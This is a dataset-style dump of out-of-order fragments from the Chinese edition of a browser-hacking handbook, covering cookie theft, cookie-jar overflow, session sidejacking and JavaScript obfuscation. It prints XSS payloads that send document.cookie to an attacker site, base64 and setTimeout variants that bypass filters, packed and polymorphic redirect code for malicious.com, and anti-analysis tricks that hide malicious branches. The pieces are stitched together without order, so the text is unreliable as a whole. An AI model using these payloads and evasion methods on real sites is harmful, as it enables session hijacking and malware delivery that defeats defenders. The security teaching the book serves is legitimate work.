text
stringlengths
64
2.99M
以下JavaScript代码会创建相应的内嵌框架并窃取该cookie: iframe=document.createElement('iframe'); iframe.src='http://browserhacker.com:4000/checkout'; iframe.onload=function(){ alert(iframe.contentWindow.document.cookie); }; document.body.appendChild(iframe); 将这些代码打包在一起,就变成了如下形式,这些代码会在IFrame完全加载后执行: /?test=hi<script>iframe=document.createElement('iframe')%3b iframe.src='http://browserhacker.com:4000/checkout'%3biframe .onload=function(){alert(iframe.contentWindow.document.cookie )}%3bdocument.body.appendChild(iframe)</script> 执行这段JavaScript的结果如图6-15所示。
图 6-15 窃取到根路径下的限制cookie 这个例子展示了用于保护cookie的 Path 属性的不足之处,特别是在XSS或其他Web应用缺陷存在的情况下,这种不足就更危险了。
6.2.4 cookie存储区溢出 大多数网站都默认在设置了cookie后,还会以相同的状态取得它。 网站设置cookie后,cookie会被保存在存储区(也就是浏览器用于保存站点信息的本地数据库)。
下面就来看一个例子: 12 Alex Kouzemtchenko. (2008). Racing to downgrade users to cookie-less authentication . Retrieved December 1, 2013 from http://kuza55.blogspot.co.uk/2008/02/racing-to-downgrade-users-to-cookie.html 13 Chris Evans. (2008). Cookie forcing . Retrieved December 1, 2013 from http://scarybeastsecurity.blogspot.co.uk/2008/11/cookie-forcing.html 14 John Wilander. (2012). Advanced CSRF and Stateless Anti-CSRF . Retrieved August 12, 2013 from http://www.slideshare.net/johnwilander/advanced-csrf-and-stateless-anticsrf require 'rubygems' require 'thin' require 'rack' require 'sinatra' require 'json' class CookieDemo < Sinatra::Base get "/" do link_url = "http://www.google.com" if !request.cookies['link_url'] then response.set_cookie "link_url", {:value => link_url, :httponly => true} else link_url = request.cookies['link_url'] end '<A HREF="' + link_url + '">Secret Login Page</A> <script> function setCookie() { document.cookie = "link_url=http://blog.browserhacker.com"; alert("Single cookie sent"); } function setCookies() { var i = 0; while (i < 200) { kname = "test_COOKIE" + i; document.cookie = kname + "=test"; i = i + 1; } document.cookie = "link_url=http://browserhacker.com"; alert("Overflow Executed"); } </script> <BR> <input type=button value="Attempt Change" onclick="setCookie()"><BR> <input type=button value="Spam Cookies" onclick="setCookies()"> ' end end @routes = { "/" => CookieDemo.new } @rack_app = Rack::URLMap.new(@routes) @thin = Thin::Server.new("browserhacker.com", 4000, @rack_app) Thin::Logging.silent = true Thin::Logging.debug = false puts "[#{Time.now}] Thin ready" @thin.start 在这个例子中,浏览器加载页面时会设置link_url cookie。
图 6-17 显示了警告框,但链接并没有变 但是,如图6-18所示,点击了Spam Cookies按钮然后再刷新页面,会发现链接指向了http://browserhacker.com。
图 6-18 cookie存储区溢出后的链接 这个例子演示了怎么基于一个不安全的应用,以cookie为目标,通过JavaScript来控制浏览器与网页和目标的交互。 这个例子在Firefox中是可以运行的,但随着浏览器不断更新,还应该通过试验来确定到底多少cookie可以导致存储区溢出。
可以将创建cookie的代码替换成如下所示的代码: var exp = new Date(new Date().getTime() + daysInMilliseconds(5)).toGMTString(); document.cookie=" link_url=http://browserhacker.com;expires=" + exp; 这样,cookie就会为这个窗口持续保存5天,从而为你多次尝试提供了足够的时间。
15 Samy Kamkar. (2013). samyk/evercookie . Retrieved August 12, 2013 from https://github.com/samyk/evercookie 6.2.6 Sidejacking攻击 Sidejacking攻击,或者HTTP会话劫持,是通过盗取别人的会话模仿别人的一种方法。
盗取会话攻击的原理是通过复制某个用户在一个站点上的会话cookie,可以伪装成一个合法的用户。 把会话cookie复制到你的浏览器之后,相应的站点就会相信你是目标,允许你像原来的用户一样访问他们的账号。
16 Eric Butler. (2012). Firesheep . Retrieved August 12, 2013 from http://codebutler.github.io/firesheep/ Firesheep是Eric Butler写的一个Firefox插件,可以通过开放的无线网络监听会话,然后再将监听到的会话信息转发给你。
Unknown 6.7 小结 本章介绍了各种指纹采集、攻击,以及利用浏览器的技术。从检测浏览器的类型、平台和语言,到窃取会话cookie,浏览器都是最主要的目标。 缩小操作系统、浏览器版本号以及其他细节的范围,有助于针对特定的浏览器和功能实施攻击。采集到浏览器的指纹后,才能胸有成竹地采取下一步操作。 这一章,我们了解了人们对通过JavaScript加密来保护数据还缺少基本的信任。基于常见的安全问题,探索了一些绕开公开实现的技术。利用这些可以移植的方法,可以在其他JavaScript加密实现中进一步发现类似的问题。 我们还讨论了浏览器通过cookie实现的保护性机制,甚至还用了一点时间介绍了内存管理利用这个领域。由此可知,浏览器攻击的范围确实很广。 掌握了本章的技术之后,应该可以跨平台、跨工具,以及在多种攻击场景下,利用浏览器获得数据,当然还有shell的访问权。不过,你能做到的还不止这些。下一章就会探讨如何攻击曾经风靡一时的浏览器扩展,那将是一个完全不同的领域。
把这个过程转换成伪代码,如下所示: loop develop_evasion() use_it_in_the_wild() sleep 10 defenders_become_aware() sleep 20 defenders_implement_detection() end 别忘了,检测技术要广泛应用的话,可能需要很长时间。
如果你想盗取一个Web应用的cookie,且该cookie没有被标记为HttpOnly,那可以执行这行代码: location.href='http://browserhacker.com?c='+document.cookie 这行代码会把cookie发给你的网站。
为了隐藏 document.cookie ,可以使用base64对其编码,这样攻击方式就变成了: eval(atob("bG9jYXRpb24uaHJlZj0naHR0cDovL2F0dGF"+ "ja2VyLmNvbT9jPScrZG9jdW1lbnQuY29va2ll")); 但基于正则表达式的过滤器还是会阻止它,因为关键字 eval 还在黑名单中。
不过,访问 window 对象的方法有很多种,通过它们可以使用不同的语句来实现 eval 的行为,比如: [].constructor.constructor("code")(); 另一种方法是使用 setTimeout() 或 setInterval() 函数(在较新的浏览器中甚至可以使用 setImmediate() ),它们都可以对JavaScript函数求值。
使用 setTimeout() 时,最终代码会变成这样: setTimeout(atob("bG9jYXRpb24uaHJlZj0naHR0cDovL2Jyb3"+ "dzZXJoYWNrZXIuY29tP2M9Jytkb2N1bWVudC5jb29raWU")); 这段代码绕过了前面提到的基于正则表达式的过滤器,也演示了将多种躲避技术结合起来使用的方法。
以下面的代码段为例(后面还会介绍): var malware = { version: '0.0.1-alpha', exploits: new Array("http://malicious.com/aa.js",""), persistent: true }; window.malware = malware; function redirect_to_site(){ window.location = window.malware.exploits[0]; }; redirect_to_site(); 使用Dean Edwards的打包程序 17 打包这段代码后,结果如下所示: eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)}; if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c); k=[function(e){return r[e]}];e=function(){return'\\w+'}; c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+ '\\b','g'),k[c]);return p}('b 2={7:\'0.0.1-i\',4:8 9( "a://6.c/d.e",""),f:g};3.2=2;h 5(){3.j=3.2.4[0]};5();', 20,20,'||malware|window|exploits|redirect_to_site|malicious |version|new|Array|http|var|com|aa|js|persistent|true| function|alpha|location'.split('|'),0,{})) 如你所见,函数和变量名,像 malware 、 window 和 exploits ,在代码最后仍然存在。 而使用了随机变量和方法名的技术后,同样的代码会变成这样: eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)}; if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c); k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1}; while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+ '\\b','g'),k[c]);return p}('h 1={a:\'f\',3:6 7( "8://9.5/b.c",""),d:e};2.1=1;g 4(){2.i=2.1.3[0]}; 4();',19,19,'|uxGfLVC|window|egCSx|HrhB|com|new| Array|http|malicious|sXCrv|aa|js|LctUZLQnJ_gp| true|ZEpXkhxSMz|function|var|location'.split('|'),0,{})) 这两段打包后的代码明显不一样。
17 Dean Edwards. (2010). Packer . Retrieved March 8, 2013 from http://dean.edwards.name/packer/ 2. 空白符编码 Kolisar在DEFCON 16上展示了一种很巧妙的编码技术,叫作 空白符编码 (WhiteSpace encoding) 18 。
18 Kolisar. (2008). WhiteSpace: A Different Approach to JavaScript Obfuscation . Retrieved March 8, 2013 from http://www.defcon.org/images/defcon-16/dc16-presentations/defcon-16-kolisar.pdf 可以使用下面的示例Ruby实现生成编码的JavaScript,然后再在攻击中使用: def whitespace_encode(input) output = input.unpack('B*') output = output.to_s.gsub(/[\["01\]]/, \ '[' => '', '"' => '', ']' => '', '0' => "\t", '1' => ' ') end encoded = whitespace_encode("alert(1)") File.open("whitespace_out.js", 'w'){|f| f.write(encoded)} 试一下就知道,传入 whitespace_encode() 函数的内容会被转换成二进制表示,然后0再被映射为Tab,1再被映射为Space。
下面的JavaScript实现包含了保存有前面编码结果的变量 whitespace_encoded : // 如果从这里复制粘贴代码,Tab可能无效 // 确保你是在尝试browserhacker.com的代码片段 var whitespace_encoded = " "; function decode_whitespace(css_space) { var spacer = ''; for(y = 0; y < css_space.length/8; y++){ v = 0; for(x = 0; x < 8; x++){ if(css_space.charCodeAt(x+(y*8)) > 9){ v++; } if(x != 7){ v = v << 1; } } spacer += String.fromCharCode(v); }return spacer; } var decoded = decode_whitespace(whitespace_encoded) console.log(decoded.toString()); window.setTimeout(decoded); 这个 decode_whitespace 函数用于解码 whitespace_encoded 变量的内容,其中包含使用前面的Ruby脚本生成的空白符。
最后,再使用 setTimeout 对解码后指令的字符串表示求值,最后执行代码。 如图3-15所示,解码后的源代码( alert(1) )在 setTimeout() 调用中被求值了。
19 Peter Ferrie, (2011). Malware Analysis . Retrieved March 8, 2013 from http://pferrie.host22.com/papers/jjencode.pdf 20 Mario Heiderich, Eduardo Alberto Vela Nava, Gareth Heyes, and David Lindsay. (2011). Web Application Obfuscation . Retrieved March 8, 2013 from http://www.amazon.co.uk/Web-Application-Obfuscation-WAFs-Evasion-Filtersalert/dp/1597496049 非数字字母JavaScript极度依赖JavaScript中的特定类型转换功能,这种转换功能在Java或C++等强类型语言中是不存在的。
首先,在JavaScript中,可以通过在变量后面拼接一个空字符串,将其转换成字符串表示: 1+"" //返回"1" 其次,只使用符号就有很多种方式可以返回布尔值。
例如,可以使用空数组、空对象和空字符串: ![] //返回false !{} //返回false !"" //返回true 基于这些行为,很容易构建字符串。 比如,要构建一个字符串 "false" ,可以使用以下代码: ([![]]+[]) 首先是一个空数组 [] ,使用 ! 对其求反,得到布尔值 false 。
下面是一个很老的例子,可以在Firefox中使用: alert((1,[].sort)()) 下面是一个改写后的例子,在Chrome中可以使用: alert((0,[].concat)()) 前面两个例子使用 sort 和 concat 函数返回 window ,因为它们不知道引用的是哪个数组。
前面我们也讨论了对字符串求值的方法,但最简单的方法还是使用 constructor : [].constructor.constructor("alert(1)")() 从一个数组对象访问两次 constructor ,就可以得到 Function 。 之后,就可以传入任意字符串以求值了,比如传入 "alert(1)" 。
下面是使用JJencode编码 alert(1) 得到的结果: 21 Yosuke Hasegawa. (2009). JJEncode . Retrieved March 8, 2013 from http://utf-8.jp/public/jjencode.html 22 Yosuke Hasegawa. (2009). AAEncode . Retrieved March 8, 2013 from http://utf-8.jp/public/aaencode.html $=~[];$={___:++$,$$$$:(![]+"")[$],__$:++$,$_$_:(![]+"")[$], _$_:++$,$_$$:({}+"")[$],$$_$:($[$]+"")[$],_$$:++$,$$$_:(!""+"")[$], $__:++$,$_$:++$,$$__:({}+"")[$],$$_:++$,$$$:++$,$___:++$,$__$:++$}; $.$_=($.$_=$+"")[$.$_$]+($._$=$.$_[$.__$])+($.$$=($.$+"")[$.__$])+ ((!$)+"")[$._$$]+($.__=$.$_[$.$$_])+($.$=(!""+"")[$.__$])+($._=(!""+ "")[$._$_])+$.$_[$.$_$]+$.__+$._$+$.$;$.$$=$.$+(!""+"")[$._$$]+$.__+ $._+$.$+$.$$;$.$=($.___)[$.$_][$.$_];$.$($.$($.$$+"\""+$.$_$_+(![]+ "")[$._$_]+$.$$$_+"\\"+$.__$+$.$$_+$._$_+$.__+"("+$.__$+"\\"+$.$__+ $.___+")"+"\"")())(); 显然,编码短短的 alert(1) 就需要那么多字符。
Yosuke最初关于JJencode的思路激起了安全行业的兴趣,导致了这个领域的更多研究,而最后Robert Hansen还在slackers.org上办起了Diminutive NoAlNum JS Contest 23 。
23 sla.ckers.org. (2009). Diminutive NoAlNum JS Contest . Retrieved March 8, 2013 from http://sla.ckers.org/forum/read.php?24,28687 3.4.2 使用模糊躲避 前几节介绍了编码的原理,以及怎么通过它们隐藏JavaScript代码。 模糊作为另一种隐藏JavaScript代码的方法,在与编码共同使用时,能够更加有效地绕过网络过滤器。
24 Fraser Howard. (2012). Exploring the Blackhole exploit kit . Retrieved March 8, 2013 from http://nakedsecurity.sophos.com/exploring-the-blackhole-exploit-kit-10/ 1. 随机变量和方法 如果你是一名开发人员,就应该知道编写清晰和可维护的代码始终是最优考虑的事情。
然后将 malware 对象附加到 window 对象,再调用 redirect_to_site() 函数,该函数会把浏览器重定向到前面 exploits 数组中的第一个URL: var malware = { version: '0.0.1-alpha', exploits: new Array("http://malicious.com/aa.js",""), persistent: true }; window.malware = malware; function redirect_to_site(){ window.location = window.malware.exploits[0]; }; redirect_to_site(); 现在假设有一个网络过滤器,正在使用基于正则表达式的规则搜索网络流量,检测其中的 malware 代码、 version 号和 redirect_to_malware() 及其他函数名。
25 Graham Cluley. (2012). Server-side polymorphism: How mutating web malware tries to defeat anti-virus software . Retrieved March 8, 2013 from http://nakedsecurity.sophos.com/2012/07/31/server-side-polymor-phism-malware/ 实现基本的服务器端代码多态化并不困难。
下面这个简单的例子演示了针对每个勾连的浏览器使用散列数据结构(如果你想实现每个会话多态化),分别保存原始值和随机值以备将来引用。
code = <<EOF var malware = { version: '0.0.1-alpha', exploits: new Array("http://malicious.com/aa.js",""), persistent: true }; window.malware = malware; function redirect_to_site(){ window.location = window.malware.exploits[0]; }; redirect_to_site(); EOF def rnd(length=5) chars = 'abcdefghjkmnpqrstuvwxyzABCDEFGHJKLMNPQRSTUVWXYZ_' result = '' length.times { result << chars[rand(chars.size)] } result end lookup = { "malware" => rnd(7), "exploits" => rnd(), "version" => rnd(), "persistent" => rnd(12), "0.0.1-alpha" => rnd(10), "redirect_to_site" => rnd(4) } lookup.each do |key,value| code = code.gsub!(key, value) end File.open("result.js", 'w'){|f|f.write(code)} 每次调用前面的代码(比如勾连一个新浏览器), result.js 中的JavaScript代码都会不同。 例如: var uxGfLVC = { sXCrv: 'ZEpXkhxSMz', egCSx: new Array("http://malicious.com/aa.js",""), LctUZLQnJ_gp: true }; window.uxGfLVC = uxGfLVC; function HrhB(){ window.location = window.uxGfLVC.egCSx[0]; }; HrhB(); 随机变量和函数名不考虑作用域。
假设前面的代码中包含了另一个叫 execute() 的函数,而 redirect_to_site() 接收了一个输入参数: function execute(cmd){ eval(cmd); }; function redirect_to_site(input){ if(input) window.location = window.malware.exploits[0]; }; redirect_to_site(input); 模糊这个示例并考虑作用域会得到如下代码。
function gSYYtNBjNFbZ(napSj){ eval(napSj); }; function HrhB(napSj){ if(napSj) window.location = window.uxGfLVC.egCSx[0]; }; HrhB(napSj); 2. 混合对象表示法 如果要看很多JavaScript代码,我们通常习惯于用点访问属性,而不习惯于用方括号 26 。
26 Mozilla. (2010). Property Accessors . Retrieved March 8, 2013 from https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Operators/Member_Operators 前面的代码使用的是点表示法。
比如,先调用 window 对象,然后是 malware 对象,最后是 malware 对象的属性: window.malware.exploits[0]; 同样的代码可以用方括号表示法写成这样: window['malware']['exploits'][0]; 混合两种表示法同样可以写出功能一样的代码: window.malware['exploits'][0]; 扩展一下,可以对前面的例子组合使用这些技术,包括base64编码,得到如下结果: var uxGfLVC = { sXCrv: 'ZEpXkhxSMz', egCSx: new Array("\x68\x74\x74\x70\x3A\x2F\x2F"+ "\x6D\x61\x6C\x69\x63\x69\x6F"+ atob("dXMuY35f34fgdkFhLmpz"['replace']( /35f34fgdk/,'29tL2')),""), LctUZLQnJ_gp: true }; window['uxGfLVC'] = uxGfLVC; function HrhB(){ window['lo'+'ca'+'ution'['replace']( /ution/,'tion')] = window.uxGfLVC['egC'+ 'Sx'][0]; }; HrhB(); 很明显(或者并不明显),混合使用点和方括号表示法,代码变得不可读了。
在前面例子的代码中,访问对象的方法和属性也采用了同样的语法,而且使用了没有意义的变量名,你可能会认为方括号是用来从数据结构中取得值的。
下面看一个例子: var timeout = 10000; var interval = new Date().getSeconds(); function timer(){ var s_interval = new Date().getSeconds(); var diff = s_interval - interval; if(diff == 10 && diff > 0) key = diff + "aaa" if(diff == -10 && diff < 0) key = diff + "bbb" decrypt(key); } function decrypt(key){ // 加密程序 alert(key); } setTimeout("timer()", timeout); timer() 函数会在10秒钟的延迟后被调用。
以下代码调用了 decrypt() 函数,将两个 String 对象(来自DOM)拼接起来的一个字符串作为参数: <body> <div id="hidden_div"> <p>key</p> </div> </body> 第二个字符串来自页面的URI——http://browserhacker.com/mixed-content/dom.html#YTJWNU1pMWpiMjUwWlc1MA==: function decrypt(key){ // 加密程序 alert(key); } var key = document.getElementById('hidden_div').innerHTML; var key2 = location.href.split("#")[1]; decrypt(key + key2); 如果人类分析师只针对这段脚本本身进行反模糊,那么结果就不会特别好。
如果检查失败,函数的部分代码将不会执行。 如果有人在手工对这些代码求值,修改了它,那么检查就可能会失败。 这种情况在手工审查模糊代码时经常出现。
例如,嵌套的 eval() 调用可能会被替换成 console.log() 之类的辅助函数,或其他自定义的打印输出函数,以便在实际求值函数之前更好地理解代码。
如果在一个依赖 arguments.callee 检查自身长度的模糊函数内使用这种手段,那么示例中包含恶意代码的部分可能永远也不会执行。 如果手工分析过程中修改了这种模糊代码,而对代码长度的检查并没有变化,那么恶意代码就不会运行了。
为了更好地理解上述过程,可以看一看下面这段Ruby代码的实现: placeholder = "XXXXXX" code = <<EOF function boot(){ var key = arguments.callee.toString().replace(/\\W/g,""); console.log(key.length); if(key.length == #{placeholder}){ console.log("verification OK"); //...这里是恶意代码 }else{ console.log("verification FAIL"); //...这里是死代码} } EOF code_length = code.gsub(/\W/,"").length # XXXXXX -> 6 chars digits = code_length.to_s.length # returns the number of integer digits if(digits >= placeholder.length) to_add = digits - placeholder.length final_code = code.gsub(placeholder , (code_length + to_add).to_s) else to_remove = placeholder.length - digits final_code = code.gsub(placeholder , (code_length - to_remove).to_s) end File.open("result.js", 'w'){|f|f.write(final_code)} 得到的JavaScript将被写入result.js,内容如下所示: function boot(){ var key = arguments.callee.toString().replace(/\W/g,""); console.log(key.length); if(key.length == 166){ console.log("verification OK"); //...这里是恶意代码 }else{ console.log("verification FAIL"); //...这里是死代码 } } 为方便说明起见,这里的代码并没有模糊,而且通过Ruby脚本计算的 166 整数也没有,但这两方面通过使用前面介绍的技术都很容易模糊掉。
比如,在经过前面Ruby代码处理后,你可以用以下代码代替 166 : document.getElementById('hidden_div').innerHTML + atob(location.href.split("#")[1]) document.getElementByID() 函数会从当前文档中取得ID为 hidden_div 的元素,结果返回 160 。
6. 使用JavaScript引擎的奇怪特性躲避 如果你知道自己的目标使用的是什么渲染引擎,就可以调整自己的模糊技术,通过利用不同渲染引擎间的JavaScript差异,增大反模糊的难度。
比如,Trident(IE的引擎)在对下面的代码求值时返回 true ,而Gecko和WebKit则返回 false : '\v'=='v' 另一种识别IE的类似方法是使用条件注释,因为条件注释只在IE中有效。
下面再看一个简单的例子,这里的布尔取反操作符 ! ,只有在通过 @cc_on 启用条件注释的情况下才起作用: is_ie=/*@cc_on!@*/false; 如果是IE在对这行代码求值,就会将其解释为 !false ,从而让变量 is_ie 的值为 true 。 而在其他浏览器中,由于会把布尔取反操作符看成代码注释,所以变量 is_ie 的值都将为 false 。
那么过滤引擎(SpiderMonkey)在对如下代码求值时总会进入 else 块: if('\v'=='v'){ ... // 针对IE的恶意代码 }else{ ... // 针对非IE浏览器的非恶意代码 } 过滤引擎解析代码后会进入 else 语句块,确定其不包含恶意代码。
正是你,带着它穿过那些旨在保护你的网络安全的重重关卡,并执行那些只有你的最高权限才能控制的指令,一切都以渲染网页为名,把根本就不了解甚至不能信任的内容呈现于屏幕之上。
3 Wikipedia. (2013). Client-server model . Retrieved December 12, 2013 from http://en.wikipedia.org/wiki/Client-server_model 4 Wikipedia. (2013). Request-response . Retrieved December 12, 2013 from http://en.wikipedia.org/wiki/Request-response 服务器和客户端必须相互依赖,才能发挥自己最大的潜能。
1.2.3 HTTP首部 可以把HTTP首部想象成写在信封上的地址和其他相关说明,它们描述的是它们封装的包应该发往何处,以及接收方该如何处理包中的内容。
HTTP首部是HTTP协议定义的原初指令,用于指示接收方怎么处理其后的内容。 Web客户端要在所有请求的开头提供HTTP首部,而Web服务器也要在任何响应的开头附上HTTP首部。 首部内容决定了接收方(可能是服务器,也可能是浏览器)如何处理被发送的内容。
不用说大家也知道,Web浏览器使用的标记语言是HTML。 1. HTML HTML,即HyperText Markup Language(超文本标记语言),是一种常用的编程语言,主要用于告诉浏览器如何显示网页。 HTML源于SGML(Standard Generalized Markup Language,标准通用标记语言),经过多年发展,已经有了非常大的变化。
1.2.6 脚本 Web脚本语言是一门值得学习的艺术。 如果你想搞Web技术,那迟早要掌握脚本语言。 总体来说,脚本编程是在浏览器中实现Web开发必备的技能。
使用JavaScript编写的攻击脚本,也是可以跨浏览器运行的(但不排除会受个别浏览器奇怪特性的影响)。 不管怎么说,JavaScript都是探查浏览器漏洞必备的语言。
1.2.7 DOM DOM,即document object model(文档对象模型),是浏览器中的一个基础性概念。 DOM是在浏览器中操作HTML或XML文档的API,使用脚本语言可以通过DOM提供的对象操作HTML元素。 DOM是为JavaScript这样的脚本语言而定义的。 DOM规范定义了通过脚本操作实时文档的方法,即浏览器中运行的脚本可以动态读取或修改网页内容。
6 Wikipedia. (2013). Web browser engine . Retrieved December 15, 2013 from http://en.wikipedia.org/wiki/Layout_engine 渲染引擎是浏览器的核心组件,负责把数据转换为用户在屏幕上可以看到的样式。
说到图形,实际上也有只解析文本的渲染引擎,比如Lynx和W3M。 Web上的渲染引擎有很多种 7 。 本书涉及的图形渲染引擎包括WebKit、Blink、Trident和Gecko。
7 Wikipedia. (2013). List of layout engines . Retrieved December 15, 2013 from http://en.wikipedia.org/wiki/List_of_web_browser_engines 1. WebKit WebKit是最受欢迎的渲染引擎,很多浏览器都在用。
8 Wikipedia. (2013). WebKit . Retrieved December 15, 2013 from http://en.wikipedia.org/wiki/WebKit WebKit是一个开源项目,它的目标是成为通用的软件应用程序交互与展示引擎 9 。
9 WebKit Open Source Project. (2013). The WebKit Open Source Project - WebKit Project Goals . Retrieved December 15, 2013 from http://www.webkit.org/projects/goals.html 2. Trident Trident是微软开发的渲染引擎,也叫MSHTML。
3. Gecko Firefox是使用Gecko开源渲染引擎的最主要的软件。 Gecko应该是排在WebKit和Trident之后位居第三的渲染引擎。 Gecko是网景公司20世纪90年代为其浏览器Netscape Navigator开发的一个渲染引擎。 目前,Gecko主要用在Mozilla基金会和Mozilla公司开发的一些应用中,最主要的就是Firefox浏览器。
10 Bruce Lawson. (2013). 300 million users and move to WebKit . Retrieved December 15, 2013 from http://my.opera.com/ODIN/blog/300-million-users-and-move-to-webkit 一个主流浏览器如此巨大地切换路线,应该说是前所未有的。
在浏览器JavaScript控制台中运行以下命令,就可以在当前标签页的会话存储中保存一个 "BHH" 值: sessionStorage.setItem("BHH", "http://browserhacker.com"); sessionStorage.getItem("BHH"); 同源策略也适用于本地存储,而且每个来源都会分开。
11 Doug DePerry. (2012). HTML5 Security. The Modern Web Browser Perspective . Retrieved December 15, 2013 from https://www.isecpartners.com/media/18610/html5modernwebbrowserperspectivefinal.pdf 1.2.11 跨域资源共享 跨域资源共享 ,即CORS(cross-origin resource sharing),是一个让来源忽略同源策略的规范。
CORS的一项核心内容就是给Web服务器的HTTP响应首部增加了以下字段: Access-Control-Allow-Origin: * Access-Control-Allow-Methods: POST, GET 如果浏览器向某服务器发送了跨域 XMLHttpRequest 请求,而该服务器的响应首部并不包含以上字段,则这个跨域请求就会失败,即不能访问该服务器响应的内容。
12 Alex Russell. (2006). Comet: Low Latency Data for the Browser . Retrieved March 8, 2013 from http://infrequently.org/2006/03/comet-low-latency-data-for-the-browser/ 2. Web Worker Web Worker之前的JavaScript代码都是单线程执行的。
4. WebRTC WebRTC,即Web Real-Time Communication(Web实时通信),是HTML5运用JavaScript能力的一个进步。 使用WebRTC可以实现浏览器之间的互相通信,而且延迟很低,但要实现富媒体的实时交互,必须有高带宽支持。
但浏览器安全这个话题,一本书很难面面俱到,甚至一书架书恐怕都难以穷尽! 如果有读者对利用编译后代码中的隐患感兴趣,可以找一本《黑客攻防技术宝典:系统实战篇(第2版)》看看。
Unknown 中文版推荐序 浏览器作为用户访问互联网的入口,其安全性至关重要。用户在浏览器中的任何一次不经意的点击,都可以成为噩梦的开始。攻击者利用浏览器的一些漏洞,仅需要用户点击一个链接:轻者可以窃取用户的cookie及身份信息,获得用户浏览记录等隐私;重者则导致用户电脑上的文件被窃取、篡改,甚至用户电脑会被安装后门,最终沦为攻击者的“囊中之物”。浏览器承载着万物互连和分享协作,因而保障浏览器的安全越来越重要。 今天,各家浏览器的发展如火如荼,特别是新的安全特性也层出不穷。比如,数据执行保护(DEP)、内存地址随机化(ASLR)、沙箱、隔离堆、延时释放、控制流防护(CFG)等,诸多安全特性的出现与应用折射出浏览器已然成为攻击者的目标。“道高一尺,魔高一丈”,新的安全特性必然会导致新的攻击方法的出现,只是攻击的难度和成本会越来越大,对攻击者技术的要求也越来越高。 未知攻,焉知防?本书是业界公认的最流行的浏览器利用工具BeEF的作者Wade等人结合自己亲身实践经验鼎力创作的,系统地介绍了浏览器的攻防技术。全书以BeFF工具为基础,将浏览器攻防分为初始化、持久化和攻击三大阶段,并在攻击阶段中从用户、浏览器核心、扩展、插件、Web应用和网络等多个方面去细化。全书一共分七个大类讲浏览器攻击方法:初始化、持久化、攻击用户和攻击浏览器、攻击扩展、攻击插件、攻击Web应用和攻击网络。每一章基本按攻击方法划分,作者对安全攻防的归类组织结构做到了一页不差,相关的技术点叙述得很清晰、很全面,并有基于BeEF等工具的实际演示,读者能很快理解和上手。很多技术点能从原理上阐述清楚,这很难能可贵。同时,攻击手段上的很多“奇技淫巧”深受广大黑客的喜爱。对爱好浏览器安全并打算详细了解和学习相关专业知识的人来说,这本书是最好不过的选择。本书是迄今为止介绍浏览器攻防实战的最详细之作。 最后特别感谢团队leader张鲁和团队成员为本书审校付出的心血! 奇虎360信息安全部 0KEE TEAM 李响 2016年8月 Unknown 在线资源 本书网站为 https://browserhacker.com 。Wiley上的本书主页为 http://www.wiley.com/go/browser-hackershandbook 。在这两个网站上,读者可以找到本书的附加内容。尽管不能替代本书,但这些附加资源是本书中内容的有益补充。 网站上还包含可以复制粘贴的代码。这样可以你节省手工输入的时间,也希望能帮你避免攻击中的麻烦。此外,还有演示视频和每章后面问题的答案。 本书不可避免地会有这样或那样的错误,这一点我们都知道。很不幸,本书三位作者中有两位不靠谱(至于靠谱的是哪一位,至今我们三个还在激烈地争论)。如果你想知道现在我们是否有了结论,可以访问网站 https://browserhacker.com ,当然更重要的是,你也可以找到对其他读者发现的错误的修正。如果你也发现了错误,而且网站中还没有列出,请告诉我们。 Unknown 2.1 理解控制初始化 获得初始控制权的第一步,就是寻找机会对目标施加某种程度的影响。为此,就要执行你设计好的初始化指令。把初始化指令安插进目标浏览器,就是初始化控制和攻击浏览器的首要任务。 代码的形式有很多。比如,JavaScript、HTML、CSS或其他浏览器能理解的代码,都可以成为初始控制的工具。有时候,初始代码的逻辑甚至可以封装在字节码文件中,比如一个恶意的SWF文件(Adobe Flash文件格式)。 采用什么技术实现对目标的控制,很大程度上取决于攻击的环境。如果使用了被盗用的站点,那么可以通过顺路下载来做。可是,如果你想要采用钓鱼式攻击,那么XSS可能是最好的选择。而如果你是在一间咖啡店,那么网络攻击恐怕最合适。随后几节,我们会逐一探讨这些攻击方法。 本章,我们会接触一个术语,叫 勾连 (hook)。勾连浏览器始于执行初始代码,然后是维护通信渠道(下一章再介绍)。当然,首先要让你宝贵的代码进入目标浏览器。 Unknown 第 10 章 攻击网络 不要忘了本书里时不时就会讨论到的支持应用协议的底层环境和技术。HTTP对底层OSI分层模型的依赖程度,与应用层中定义的其他协议是一样的。 关注攻击浏览器和Web应用是一件事,而深入底层网络又会为你打开另一番新天地。只有在网络层才能直接访问那些非HTTP服务,包括电子邮件、打印、IRC(Internet Relay Chat)等。 本章从探讨如何发现勾连浏览器的内部网络配置开始。换句话说,就是检测内部IP地址,并进行端口扫描。获得这些信息后,就可以使用一些更高级的技术,比如IPC(Inter-protocol Communication,协议间通信)和IPE(Inter-protocol Exploitation,协议间利用)。 当然,在使用IPE俘获某个目标后,需要让它连接到你控制的设备。常规的反向连接会涉及通过边界防火墙的噪声通信。我们还会介绍一个通过BeEF Bind payload回连的更隐秘的方式,用它把数据反弹到你勾连的浏览器。
Unknown 1.6 小结 毫无疑问,浏览器是21世纪这十多年来最重要的一种软件。软件厂商很少为自己的应用开发定制的客户端软件,更多的是使用Web技术开发一个应用界面:不仅仅是传统的在线Web应用,还包含部署在局域网内的本地应用。在服务器-客户端模型中,浏览器占据着不可动摇的统治地位。 浏览器在几乎所有类型的网络应用中都有一席之地,虽然很多组织试图禁用它,但这个愿望只是个泡影。任何组织都不可能放弃浏览器,唯一的选择是在自己的网络中使用它。 黑客攻击浏览器通常会伪装成非恶意的服务器,向浏览器发送有效的通信请求。多数情况下,浏览器不会知晓自己正与一个骗子服务器通信,因此就会执行骗子服务器发来的所有指令,而且还以为自己在防火墙的保护下万无一失呢。 接下来的几章将重点介绍浏览器攻防的方法,教给大家如何利用浏览器及其可以访问的设备。
1 Netscape. (1995). Netscape and Sun announce JavaScript for enterprise networks and the Internet . Retrieved February 23, 2013 from http://web.archive.org/web/20070916144913/ http://wp.netscape.com/newsref/pr/new-srelease67.html 接着,JavaScript就问世了。
